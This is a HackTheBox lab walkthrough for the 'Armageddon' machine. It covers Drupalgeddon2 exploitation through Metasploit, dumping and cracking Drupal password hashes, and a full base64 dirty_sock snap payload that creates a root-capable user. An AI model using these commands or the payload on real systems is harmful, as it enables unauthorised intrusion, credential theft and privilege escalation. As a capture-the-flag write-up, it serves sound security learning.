HackTheBox : Armageddon Walkthrough

 

Concepts Learnt :

1. Enumeration

2. Snap privilege escalation

3. Drupal exploit (metasploit)

4. python2

Steps to Enumerate :

Run an Nmap Scan to find all the open ports!

Command : nmap 10.10.10.233 -A

10.10.10.233 IP of the Server

-A This options makes Nmap make an effort in identifying the target OS,services and the versions. It also does traceroute and applies NSE scripts to detect additional information.

-vv Defines level 2 verbosity for the scan

We see that there are 4 ports open :

22/tcp- SSH port

80/tcp- HTTP port

2021/tcp — Servexec(filtered)

7435/tcp — unknown(filtered)

Lets check the http site on port 80:

A simple website with User Login!

Lets try the simple admin:password combination to check! Doesn’t work!

Checking the page source, we can see that is Drupal version 7

Let’s check if we can work a way around the login page!

Exploring, I found that Drupal 7 can be exploited using Metasploit!

Command : msfconsole

Command : search drupal

We will use the drupalgeddon2

Command : use 4

Let’s see all the options

Command : show options

We need to specify RHOSTS, TARGETURI, LHOST and LPORT!

Let do that by using the set command

Command : set (RHOSTS/TARGETURI/LHOST/LPORT)

You will also need to set the LHOSTS to your tun0 ip address

To check your tun0 ip

Command : ifconfig

Now we will exploit!

Command : exploit

And we get a meterpreter session!

Lets remove meterpreter and get the shell!

Command : shell

Lets look around!

We have multiple folders available, Let’s check them!

Checking the sites folder we have a default folder!

Checking that out we have settings.php file!

Command : cat settings.php

Checking this file out, we possibly get credentials for mysql and the database name!

Let’s explore the tables in the database!

Command : mysql -u ****** -p************** -D drupal -e ‘show tables;’

We get a list of tables in the drupal database.

Lets check the users list!

Command : mysql -u ********* -p****************** -D drupal -e ‘select name,pass from users;’

We get 2 users and password hashes one of which is an admin!

Let’s run these passwords through john the ripper!

Save the admin hash in a file, I named it hash and saved it on desktop

We will run it through the rockyou.txt wordlist

Command : john ~/Desktop/hash -w /usr/share/wordlists/rockyou.txt

You will get the cracked password below!

Let’s use the credentials we have to ssh into the box!

Command : ssh username@10.10.10.233

And we are in!

Checking the file system we have user.txt our first flag!

Checking root privileges :

Command : sudo -l

The user can run snap install without password!

Checking for possible privilege escalation using snap we find a github repository for dirty_sock

Link to same here

Lets use this!

However the dirty sock requires python 3 and while checking for the python version on the box we get the python version as 2.7.5

Command : python — version

We will have to manually add in the dirty_sock code.

Checking the raw dirty_sock code for version 2, we find a code in the first half which looks like this!

Lets copy and print this in a .snap file using python 2 and try installing it!

— code —

python2 -c ‘print “aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw” + “A”*4256 + “==”’ | base64 -d > leet.snap

— code —

Copy the code above and run it as it is!

Lets install dirty sock now!

Command : sudo /usr/bin/snap install — devmode leet.snap

This will install dirty sock on the system!

Now check the home directory, there will be an additional user dirty_sock

Let change user to dirty_sock

Command : su dirty_sock

The default username and password for dirty_sock is dirty_sock

NOTE : If an error pops up saying ‘user dirty_sock does not exist’ reset the machine and redo the steps mentioned above!

We are in!

Now we need to run as root!

Command : sudo -i

Again enter the password : dirty_sock

Now move into root directory and we have our second flag in root.txt!

This was a fun room to work on. Hope you enjoyed!